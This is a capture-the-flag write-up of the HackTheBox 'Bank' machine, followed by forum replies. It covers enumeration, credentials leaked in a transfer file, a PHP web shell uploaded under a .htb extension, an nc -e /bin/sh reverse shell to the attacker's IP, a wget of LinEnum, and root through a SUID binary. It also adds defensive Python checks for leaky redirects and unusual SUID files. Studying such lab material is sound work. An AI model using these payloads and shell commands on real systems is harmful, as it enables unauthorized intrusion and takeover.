Bank write-up by Arrexel

##Enumeration##

###Nmap###

nmap -T4 -A -v 10.10.10.29

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-18 15:11 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:11
Completed NSE at 15:11, 0.00s elapsed
Initiating NSE at 15:11
Completed NSE at 15:11, 0.00s elapsed
Initiating Ping Scan at 15:11
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 15:11, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:11
Completed Parallel DNS resolution of 1 host. at 15:11, 0.02s elapsed
Initiating SYN Stealth Scan at 15:11
Scanning 10.10.10.29 [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Increasing send delay for 10.10.10.29 from 0 to 5 due to 138 out of 344 dropped probes since last increase.
Increasing send delay for 10.10.10.29 from 5 to 10 due to 113 out of 281 dropped probes since last increase.
Warning: 10.10.10.29 giving up on port because retransmission cap hit (6).
Completed SYN Stealth Scan at 15:12, 53.95s elapsed (1000 total ports)
Initiating Service scan at 15:12
Scanning 3 services on 10.10.10.29
Completed Service scan at 15:12, 11.36s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.29
Retrying OS detection (try #2) against 10.10.10.29
Retrying OS detection (try #3) against 10.10.10.29
Retrying OS detection (try #4) against 10.10.10.29
Retrying OS detection (try #5) against 10.10.10.29
Initiating Traceroute at 15:13
Completed Traceroute at 15:13, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:13
Completed Parallel DNS resolution of 2 hosts. at 15:13, 0.02s elapsed
NSE: Script scanning 10.10.10.29.
Initiating NSE at 15:13
Completed NSE at 15:13, 8.54s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Nmap scan report for 10.10.10.29
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (EdDSA)
53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

We can see the server is running SSH, a DNS server and an Apache server. The default Apache page loads, so it is fairly safe to assume it requires a hostname to view the actual website. When I originally did this box, I just guessed bank.htb as the host, as several other boxes had a similar setup. After speaking with quite a few people, nobody had a better answer for how to actually get the hostname. If you know, please share in the comments!

Edit: after speaking with a ton of people, including most of our moderators and admins (including the machine tester) it appears as if the DNS server was not configured to disclose the domain name. So, unfortunately, in this case we just had to guess!

If we add bank.htb to our /etc/hosts file and attempt to browse to it, we are presented with a login page.

At this point we want to fuzz the site to see if there is anything interesting.

###Dirbuster###

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Sep 18 19:22:36 EDT 2017
--------------------------------

http://bank.htb:80
--------------------------------
Directories found during testing:

Dirs found with a 302 response:
/

Dirs found with a 403 response:
/uploads/
/icons/

Dirs found with a 200 response:
/assets/
/assets/js/
/assets/css/
/assets/font-awesome/
/assets/fonts/
/assets/img/
/assets/js/theme/
/assets/font-awesome/css/
/assets/font-awesome/fonts/
/assets/font-awesome/less/
/assets/font-awesome/scss/
/assets/css/theme/
/inc/

--------------------------------
Files found during testing:

Files found with a 302 responce:
/index.php
/support.php
/logout.php
/inc/header.php

Files found with a 200 responce:
/login.php
/assets/js/jquery.js
/assets/js/bootstrap.min.js
/assets/js/sweetalert.min.js
/assets/js/bootstrap.js
/assets/img/Thumbs.db
/assets/fonts/glyphicons-halflings-regular.eot
/assets/js/theme/calendar.js
/assets/css/htb-bank.css
/assets/js/theme/custom.js
/assets/css/login.css
/assets/js/theme/forms.js
/assets/fonts/glyphicons-halflings-regular.ttf
/assets/css/bootstrap.css
/assets/fonts/glyphicons-halflings-regular.woff
/assets/js/theme/editors.js
/assets/js/theme/tables.js
/assets/css/bootstrap.min.css
/assets/css/sweetalert.css
/assets/fonts/glyphicons-halflings-regular.woff2
/assets/js/theme/stats.js
/assets/fonts/glyphicons-halflings-regular.svg
/assets/font-awesome/css/font-awesome.css
/assets/font-awesome/fonts/FontAwesome.otf
/assets/font-awesome/scss/_bordered-pulled.scss
/assets/font-awesome/less/bordered-pulled.less
/assets/font-awesome/css/font-awesome.min.css
/assets/css/theme/calendar.css
/assets/font-awesome/less/fixed-width.less
/assets/css/theme/forms.css
/assets/font-awesome/less/font-awesome.less
/assets/css/theme/buttons.css
/assets/font-awesome/scss/_core.scss
/assets/css/theme/stats.css
/assets/font-awesome/scss/_larger.scss
/assets/font-awesome/fonts/fontawesome-webfont.eot
/assets/font-awesome/scss/_icons.scss
/assets/font-awesome/scss/_list.scss
/assets/css/theme/styles.css
/assets/font-awesome/less/larger.less
/assets/font-awesome/less/core.less
/assets/font-awesome/scss/_mixins.scss
/assets/font-awesome/scss/_fixed-width.scss
/assets/font-awesome/scss/_path.scss
/assets/font-awesome/less/list.less
/assets/font-awesome/scss/_rotated-flipped.scss
/assets/font-awesome/less/mixins.less
/assets/font-awesome/scss/_spinning.scss
/assets/font-awesome/less/path.less
/assets/font-awesome/less/icons.less
/assets/font-awesome/less/spinning.less
/assets/font-awesome/fonts/fontawesome-webfont.ttf
/assets/font-awesome/less/stacked.less
/assets/font-awesome/scss/_variables.scss
/assets/font-awesome/fonts/fontawesome-webfont.svg
/assets/font-awesome/less/rotated-flipped.less
/assets/font-awesome/less/variables.less
/assets/font-awesome/fonts/fontawesome-webfont.woff
/assets/font-awesome/scss/font-awesome.scss
/assets/font-awesome/scss/_stacked.scss
/inc/footer.php
/inc/user.php
/inc/ticket.php

--------------------------------

##Exploitation##
###Method 1 (Intended)###
While this was the intended method, many people overlooked it due to support.php being visible almost immediately when scanning. The /balance-transfer/ directory took some time to find but is the intended method.

If you look through the files, they are all encrypted at first glance. If you take a closer look, there is one file which is much smaller than the rest:

Bank Balance Transfer File

If you open up the file, we see some nice, unencrypted credentials that we can use to log into the control panel.

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

From here we can head over to the support page and upload our malicious PHP file, with the extension .htb. Refer to Method 2 to get more information on this.

###Method 2 (Unintended)###

If you look at the response size for support.php you may notice something is a bit off, especially considering the page gives a 302 redirect.

Let’s fire up Burp and take a closer look. Enable server response intercepting in the proxy options and see what the page response is before the redirect fires.

Look at that, the entire page contents are sent before we are redirected. If we create a local HTML file and paste in the form section, we can hopefully create tickets. Don’t forget to change the form action to the server and include JQuery from the server.

Note the comment <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->. From the looks of it, this is definitely the right way in.

<html>
    <body>
        <form class="new_ticket" id="new_ticket" accept-charset="UTF-8" method="post" enctype="multipart/form-data" action="http://bank.htb/support.php">
            <label>Title</label>
            <input required placeholder="Title" class="form-control" type="text" name="title" id="ticket_title" style="background-repeat: repeat; background-image: none; background-position: 0% 0%;">
            <br>
            <label>Message</label>
            <textarea required placeholder="Tell us your problem" class="form-control" style="height: 170px; background-repeat: repeat; background-image: none; background-position: 0% 0%;" name="message" id="ticket_message"></textarea>
            <br>
            <div style="position:relative;">
                    <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
                    <a class='btn btn-primary' href='javascript:;'>
                        Choose File...
                        <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40"  onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'>
                    </a>
                     
                    <span class='label label-info' id="upload-file-info"></span>
            </div>
            <br>
            <button name="submitadd" type="submit" class="btn btn-primary mt20" data-disable-with='<div class="loading-o" style="padding: 7px 21px;"></div>'>Submit</button>
        </form>
        
        <script src="http://bank.htb/assets/js/jquery.js"></script>
    </body>
</html>

Create a malicious PHP file of your choosing, in this case I just used <?php echo (system($_GET['go'])); ?> and save it with .htb as the extension.

Upload it using the local HTML file we created. We immediately get redirected to the login page. Going back to our dirbust, we see an /uploads/ folder. If we browse to http://bank.htb/uploads/writeup.htb we find our file!

Start our local nc listener with nc -nvlp 6969 and get the server to connect back to us by browsing to http://bank.htb/uploads/writeup.htb?go=nc -e /bin/sh 10.10.14.3 6969 and we now have shell! We can grab the user flag from /home/chris/user.txt

At this point, there is nothing that sticks out immediately for escalation. We can drop rebootuser's LinEnum script on the machine and run it to see if we can find anything. If you have never used LinEnum before, definitely check it out! I use it on every HTB machine. We will want to run it with the -t flag to enable thorough checks. It gives a ton of output, so I will trim out the parts that we don’t need. Note that I used a local Apache server to serve LinEnum.

wget 10.10.14.3/linenum.sh
chmod +x linenum.sh
./linenum.sh -t

#########################################################
##Local Linux Enumeration & Privilege Escalation Script##
#########################################################
www.rebootuser.com

Debug Info
thorough tests = enabled

Scan started at:
Tue Sep 19 03:15:16 EEST 2017

### SYSTEM ##############################################
Kernel information:
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 i686 i686 GNU/Linux

Kernel information (continued):
Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017

Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

SUID files:
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24  2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount


First thing on the SUID list is /var/htb/bin/emergency and that looks pretty ■■■■ suspicious. Let’s take a closer look.

Attempting to run it over nc seemingly does nothing, so let’s get a semi-interactive pty with the good ol’ python -c 'import pty; pty.spawn("/bin/bash")'

If we run it now, we get something! Looks like it spawns a shell for us and we just happen to be in the root group.

python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.3$ pwd
pwd
/var/htb/bin
bash-4.3$ ls
ls
emergency
bash-4.3$ ./emergency
./emergency
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

Grab the flag from /root/root.txt and that’s all she wrote!
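For the defending side of Method 2, a check that flags redirect responses which still carry page content, as support.php did. This is an added example, not part of the original post; the sample responses are constructed, and the function names and the 64-byte threshold are assumptions.

```python
# Added example: flag 3xx responses that still carry real page content.
import re

# Constructed sample responses (not captured from the target).
LEAKY = (b"HTTP/1.1 302 Found\r\n"
         b"Location: login.php\r\n"
         b"Content-Type: text/html\r\n\r\n"
         b"<html><body><form id=\"new_ticket\" method=\"post\" "
         b"enctype=\"multipart/form-data\">"
         b"<input type=\"file\" name=\"fileToUpload\"></form></body></html>")
CLEAN = (b"HTTP/1.1 302 Found\r\n"
         b"Location: login.php\r\n"
         b"Content-Length: 0\r\n\r\n")

def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def redirect_leaks_content(raw, max_body=64):
    """Return findings for a redirect whose body exposes page content."""
    status, headers, body = parse_response(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return []
    findings = []
    text = body.decode("utf-8", "replace")
    # Assumption: a legitimate redirect body is empty or a short stub.
    if len(body.strip()) > max_body:
        findings.append("body of %d bytes sent with %d" % (len(body), status))
    if re.search(r"<form\b", text, re.I):
        findings.append("HTML form present in redirect body")
    if re.search(r"type=[\"']?file", text, re.I):
        findings.append("file upload field present in redirect body")
    return findings
```

The usual fix on the server is to stop script execution immediately after the redirect header is set, so nothing past the authentication check is rendered.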
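The same triage that picked /var/htb/bin/emergency out of the LinEnum output can be run as a routine audit. This is an added example, not part of the original post: it parses SUID lines copied from the listing above and reports any outside the directories where packaged SUID binaries normally live; the directory list and function names are assumptions.

```python
# Added example: triage an SUID listing for binaries outside system paths.
import posixpath

# Subset of the SUID lines shown in the LinEnum output in the post.
LISTING = """\
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
"""

# Assumption: directories where distro packages install SUID binaries.
SYSTEM_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib")

def parse_line(line):
    """Parse one `ls -l` style line into a dict, or None if malformed."""
    parts = line.split(None, 8)
    if len(parts) != 9 or len(parts[0]) < 10:
        return None
    mode, _, owner, group, size, _, _, _, path = parts
    return {"mode": mode, "owner": owner, "group": group,
            "size": int(size), "path": path}

def in_system_dir(path):
    """True if the normalized path sits under one of SYSTEM_DIRS."""
    norm = posixpath.normpath(path)
    return any(norm.startswith(d + "/") for d in SYSTEM_DIRS)

def triage(listing):
    """Return SUID entries located outside the expected directories."""
    findings = []
    for line in listing.splitlines():
        entry = parse_line(line)
        if entry is None or entry["mode"][3] not in "sS":
            continue  # not parseable, or the setuid bit is not set
        if in_system_dir(entry["path"]):
            continue
        entry["root_owned"] = entry["owner"] == "root"
        entry["world_exec"] = entry["mode"][9] in "xt"
        findings.append(entry)
    return findings
```

A directory allowlist is only a first pass; comparing each SUID file against the package manager's file database gives a stronger baseline.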

Hey arrexel. You wget the linenum script after setting up something like SimpleHTTPServer or something like that?

@d0ppl3r said:
Hey arrexel. You wget the linenum script after setting up something like SimpleHTTPServer or something like that?

Yeah, he would have set up a Python SimpleHTTPServer, so he would have on his end:
python -m SimpleHTTPServer then wget http://ip:8000/script

I usually use Apache as it is also built into Kali and doesn’t require a terminal window to be left open. Also I have accidentally started SimpleHTTPServer in the wrong directory in the past and want to minimize exposure of the rest of my machine. Also don’t have to remember to set the port with Apache :stuck_out_tongue:

Nice… :+1:

Good job, I didn’t know the intended way existed before :+1:

Nice write-up. Another method for priv esc is the world-writable passwd file.

Nice write-up!!

Thanks for the write-up!! I will try linenum since privesc is something very hard for me.

revisited


Strange, I got the root.txt and user.txt but the hashes cannot be submitted as a flag; I get an error when entering them. Does anybody else have the same issue?